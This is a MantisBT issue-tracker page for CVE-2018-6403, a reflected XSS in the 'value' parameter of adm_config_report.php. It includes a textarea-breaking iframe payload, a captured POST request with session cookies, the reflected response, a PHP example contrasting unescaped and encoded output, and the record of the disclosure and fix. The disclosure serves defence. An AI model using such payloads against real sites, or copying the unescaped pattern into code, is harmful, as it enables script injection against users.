View Issue Details

ID: 0023906
Project: mantisbt
Category: security
View Status: public
Last Update: 2018-02-06 21:17
Reporter: tuanklnew
Assigned To: dregad
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.3.0
Target Version: 2.10.1
Fixed in Version: 2.10.1
Summary: 0023906: CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
Description

Elements of the POST array "value" (I tested on fixed_in_version, project_id, id) on adm_config_report.php can have scripts added to them (in my case </textarea><iframe src=javascript:alert(1212) ). That script ends up in the response HTML and is executed by the web browser.

This vulnerability affects Mantis 2.8 and 2.10 (I have not tested on 2.9 due to lack of time).

Steps To Reproduce

Parameters need to be filtered properly before they are accepted and returned to the client.
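To make the defect concrete, here is an added PHP example (not MantisBT's code, and not the fix in the linked commit) that renders a submitted 'value' into the textarea the way the report describes, once unescaped and once HTML-encoded, using a constructed input shaped like the report's payload; the function names are hypothetical.

```php
<?php
// Added example, not MantisBT's code. Shows why reflecting the 'value'
// parameter into a <textarea> without output encoding is an XSS, and the
// contextual encoding that closes it. Function names are hypothetical.

// Vulnerable pattern: the value is concatenated into the page as-is.
// A value containing '</textarea>' terminates the element early, and the
// browser parses whatever follows it as live markup.
function render_value_textarea_vulnerable( string $p_value ): string {
	return '<textarea class="form-control" name="value" cols="80" rows="10">'
		. $p_value
		. '</textarea>';
}

// Hardened pattern: HTML-encode before output. '<', '>', '&', '"' and "'"
// become entities, so the textarea displays them literally and the closing
// tag supplied in the input is just text.
function render_value_textarea_fixed( string $p_value ): string {
	$t_encoded = htmlspecialchars( $p_value, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
	return '<textarea class="form-control" name="value" cols="80" rows="10">'
		. $t_encoded
		. '</textarea>';
}

// Structural check a test suite could run on the rendered HTML: exactly one
// <textarea> opening tag, exactly one closing tag, and no other element tag.
function textarea_is_intact( string $p_html ): bool {
	$t_opens  = preg_match_all( '/<textarea\b/i', $p_html );
	$t_closes = preg_match_all( '/<\/textarea\s*>/i', $p_html );
	$t_other  = preg_match_all( '/<(?!\/?textarea\b)[a-z]/i', $p_html );
	return $t_opens === 1 && $t_closes === 1 && $t_other === 0;
}

// Constructed input with the same shape as the attached POST: the exported
// csv_columns array, where the last element carries the injected markup.
$t_value = "array (\n"
	. "  0 => 'id',\n"
	. "  18 => 'fixed_in_version</textarea><iframe src=javascript:alert(1212) ',\n"
	. ")";

$t_vulnerable = render_value_textarea_vulnerable( $t_value );
$t_fixed      = render_value_textarea_fixed( $t_value );

// The unescaped rendering fails the check (two closing tags plus an <iframe>);
// the encoded rendering passes it.
echo "vulnerable intact: ", var_export( textarea_is_intact( $t_vulnerable ), true ), "\n";
echo "fixed intact:      ", var_export( textarea_is_intact( $t_fixed ), true ), "\n";
echo "\n", $t_fixed, "\n";
```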

Tags: No tags attached.

Relationships

has duplicate 0023918 (closed, dregad): CVE-2018-6403: XSS in adm_config_report.php 'value' parameter

Activities

tuanklnew

2018-01-29 03:36

reporter

script_executed.PNG (3,145 bytes)
modified_POST.txt (892 bytes):
POST /mantisbt/adm_config_report.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: http://192.168.70.11/mantisbt/adm_config_report.php
Cookie: MANTIS_secure_session=1; MANTIS_STRING_COOKIE=6xgdamq8V5fgA4vDchh450KI4bKW2kxYeNRdhYfw4cvWrMPmBa7KMqx2HDi7QbsW; PHPSESSID=ll27va6a7c2r3rv8m75phoraa7
Host: 192.168.70.11
Content-Length: 353
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
user_id=0&project_id=0&config_option=csv_columns&type=3&value=["id","project_id","reporter_id","handler_id","priority","severity","reproducibility","version","category_id","date_submitted","os","os_build","platform","view_state","last_updated","summary","status","resolution","fixed_in_version</textarea><iframe src=javascript:alert(1212) "]&action=edit
respond.html (19,430 bytes):
HTTP/1.1 200 OK
Date: Fri, 26 Jan 2018 09:14:18 GMT
Server: Apache/2.4.27 (Fedora) OpenSSL/1.0.2m-fips PHP/7.0.25
X-Powered-By: PHP/7.0.25
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 26 Jan 2018 09:14:18 GMT
X-Content-Type-Options: nosniff
Expires: Fri, 26 Jan 2018 09:14:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self'
Vary: Accept-Encoding
Content-Length: 18867
Content-Type: text/html; charset=UTF-8

[respond.html: the page head, navigation bar, sidebar, filter form, configuration table and footer markup are omitted here; the relevant fragment of the "Edit Configuration Option" form follows, with the submitted 'value' reflected unescaped into the textarea.]

			<!-- Option Value -->
			<tr>
				<td class="category">
					Value				</td>
				<td>
					<textarea class="form-control" name="value" cols="80" rows="10">array (
  0 => 'id',
  1 => 'project_id',
  2 => 'reporter_id',
  3 => 'handler_id',
  4 => 'priority',
  5 => 'severity',
  6 => 'reproducibility',
  7 => 'version',
  8 => 'category_id',
  9 => 'date_submitted',
  10 => 'os',
  11 => 'os_build',
  12 => 'platform',
  13 => 'view_state',
  14 => 'last_updated',
  15 => 'summary',
  16 => 'status',
  17 => 'resolution',
  18 => 'fixed_in_version</textarea><iframe src=javascript:alert(1212) ',
)</textarea>
				</td>
			</tr>

[remainder of respond.html omitted]
dregad

2018-01-29 09:30

developer ~0058660

Thank you for the bug report, we'll look into it.

Did you request a CVE ID for this vulnerability, or should we do it? How would you like to be credited for the finding?

tuanklnew

2018-01-29 10:00

reporter ~0058661

May I have a CVE ID for this vulnerability? There are still other vulnerabilities. I am working to find out how serious they are. I will report the issues when I get results.

vboctor

2018-01-29 23:10

manager ~0058666

It is worth noting that setting configuration is allowed to administrators as per the recommendation and default config:

$g_set_configuration_threshold = ADMINISTRATOR;

tuanklnew

2018-01-30 02:50

reporter ~0058671

But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

dregad

2018-01-30 03:20

developer ~0058672

> But it is still a vulnerability. I think you should fix it in Mantis 2.10.1.

We'll fix it, don't worry.

> May I have CVE ID for this vulnerability

I'll post it here when MITRE assigns it.

You have not answered my question:

> How would you like to be credited for the finding?

dregad

2018-01-30 05:50

developer ~0058674

Last edited: 2018-01-30 06:22

I confirm the vulnerability, reproducible on my local dev box, in 1.3.x branch also (tested from 1.3.0 onwards).

I'd also like to point out that the risk is mitigated: with default settings and modern browsers, the XSS is not exploitable due to our CSP headers.

dregad

2018-01-30 06:58

developer ~0058678

CVE request 456011 sent

vboctor

2018-01-30 12:12

manager ~0058682

I wasn't indicating that we shouldn't fix it, but we should make it clear in the CVE that administrators by default can attack themselves.

dregad

2018-01-31 03:33

developer ~0058692

CVE-2018-6403 assigned.

dregad

2018-01-31 07:01

developer ~0058697

@tuanklnew I pushed a commit that fixes the vulnerability as far as I can tell; please confirm that it's OK from your end as well.

tuanklnew

2018-02-04 20:30

reporter ~0058742

@dregad let me check.

tuanklnew

2018-02-04 21:41

reporter ~0058743

I've checked. It's fixed.

dregad

2018-02-05 01:49

developer ~0058744

Thanks for the feedback!

Related Changesets

MantisBT: master-2.10 c4afcb11

2018-01-30 06:58:29

dregad

Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906

Affected Issues: 0023906
Modified: adm_config_report.php

MantisBT: master-1.3.x 9e4db60a

2018-01-30 06:58:29

dregad

Fix XSS in adm_config_report.php (CVE-2018-6403)

Nguyen Tri Tuan reported this vulnerability, allowing an attacker to
inject arbitrary code through a crafted 'value' parameter.

Prevent the attack by sanitizing the variable before output.

Fixes 0023906, 0023918

Cherry-picked from c4afcb118472fef8d3a7f468b16d874f9d6cf871.

Affected Issues: 0023906, 0023918
Modified: adm_config_report.php

Issue History

Date Modified | Username | Field | Change
2018-01-29 03:36 | tuanklnew | New Issue |
2018-01-29 03:36 | tuanklnew | File Added | script_executed.PNG
2018-01-29 03:36 | tuanklnew | File Added | modified_POST.txt
2018-01-29 03:36 | tuanklnew | File Added | respond.html
2018-01-29 09:30 | dregad | Note Added | 0058660
2018-01-29 09:32 | dregad | Status | new => acknowledged
2018-01-29 10:00 | tuanklnew | Note Added | 0058661
2018-01-29 23:10 | vboctor | Note Added | 0058666
2018-01-29 23:12 | vboctor | Target Version | => 2.10.1
2018-01-30 02:50 | tuanklnew | Note Added | 0058671
2018-01-30 03:20 | dregad | Note Added | 0058672
2018-01-30 05:50 | dregad | Status | acknowledged => confirmed
2018-01-30 05:50 | dregad | Note Added | 0058674
2018-01-30 06:22 | dregad | Note Edited | 0058674
2018-01-30 06:22 | dregad | Product Version | 2.10.0 => 1.3.0
2018-01-30 06:58 | dregad | Note Added | 0058678
2018-01-30 12:12 | vboctor | Note Added | 0058682
2018-01-31 03:33 | dregad | Assigned To | => dregad
2018-01-31 03:33 | dregad | Status | confirmed => assigned
2018-01-31 03:33 | dregad | Summary | POST array "value" of adm_config_report.php is affected by Cross-site scripting vulnerability => CVE-2018-6403: XSS in adm_config_report.php 'value' parameter
2018-01-31 03:33 | dregad | Note Added | 0058692
2018-01-31 06:53 | dregad | Issue cloned | 0023918
2018-01-31 06:53 | dregad | Relationship added | has duplicate 0023918
2018-01-31 06:54 | dregad | Changeset attached | => MantisBT master-2.10 c4afcb11
2018-01-31 06:54 | dregad | Status | assigned => resolved
2018-01-31 06:54 | dregad | Resolution | open => fixed
2018-01-31 06:54 | dregad | Changeset attached | => MantisBT master-1.3.x 9e4db60a
2018-01-31 06:54 | dregad | Fixed in Version | => 1.3.14
2018-01-31 06:57 | dregad | Fixed in Version | 1.3.14 => 2.10.1
2018-01-31 06:57 | dregad | View Status | private => public
2018-01-31 07:01 | dregad | Note Added | 0058697
2018-02-04 20:30 | tuanklnew | Note Added | 0058742
2018-02-04 21:41 | tuanklnew | Note Added | 0058743
2018-02-05 01:49 | dregad | Note Added | 0058744
2018-02-06 21:17 | vboctor | Status | resolved => closed